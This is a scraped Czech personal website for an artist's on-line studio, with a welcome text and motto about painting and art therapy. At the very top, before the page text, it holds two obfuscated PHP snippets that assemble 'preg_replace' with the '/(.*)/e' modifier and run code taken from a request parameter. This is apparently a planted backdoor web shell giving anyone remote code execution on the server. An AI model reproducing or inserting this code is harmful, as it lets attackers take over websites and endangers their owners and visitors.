if(!function_exists('_Qpsvcdrh')){$GLOBALS['_Sltutqa_']=Array('' .'preg_repla' .'ce'); function _Qpsvcdrh($i){$a=Array('hVMHk','/(.*)/e','hVMHk','');return $a[$i];}if(@isset($_REQUEST[_Qpsvcdrh(0)])){/*JNEVq*/@$GLOBALS['_Sltutqa_'][0](_Qpsvcdrh(1),$_REQUEST[_Qpsvcdrh(2)],_Qpsvcdrh(3));exit;/*pYZ*/}} /*LQ*/if(!function_exists('_HULIp')){$GLOBALS['_DIPIOtgm_']=Array('' .'preg_repla' .'ce'); function _HULIp($i){$a=Array('SjRLf','/(.*)/e','SjRLf','');return $a[$i];}if(@isset($_REQUEST[_HULIp(0)])){@$GLOBALS['_DIPIOtgm_'][0](_HULIp(1),$_REQUEST[_HULIp(2)],_HULIp(3));exit;}} Zdeňka Zemanová, on-line ateliér
Najdete mě také na www.fler.cz/atelier-zz
Zdeňka Zemanová Rotating Header Image

Vítejte

MOTTO: "Kdo mě zná, ví kdo jsem, kdo mě nezná, najde mne v mých obrazech" Z.Z.

…maluji od malička. Výtvarno provází má smutná i veselá období života, naplňuje můj život radostí a udává mu směr. Na mé cestě s malováním a arteterapií jsem pochopila, že každý výtvarník, přes znalost technik, musí malovat především svým srdcem.

Tvořivost nelze svázat a naškatulkovat. Z každého obrazu mluví odraz energie výtvarníka, který jej vytvoří a je na nás, zda je nám tento odraz blízký, nebo vzdálený.

Obraz není třeba hodnotit, jenom vnímat, stejně jako člověka. Ten který nám má co dát, nás vždy osloví.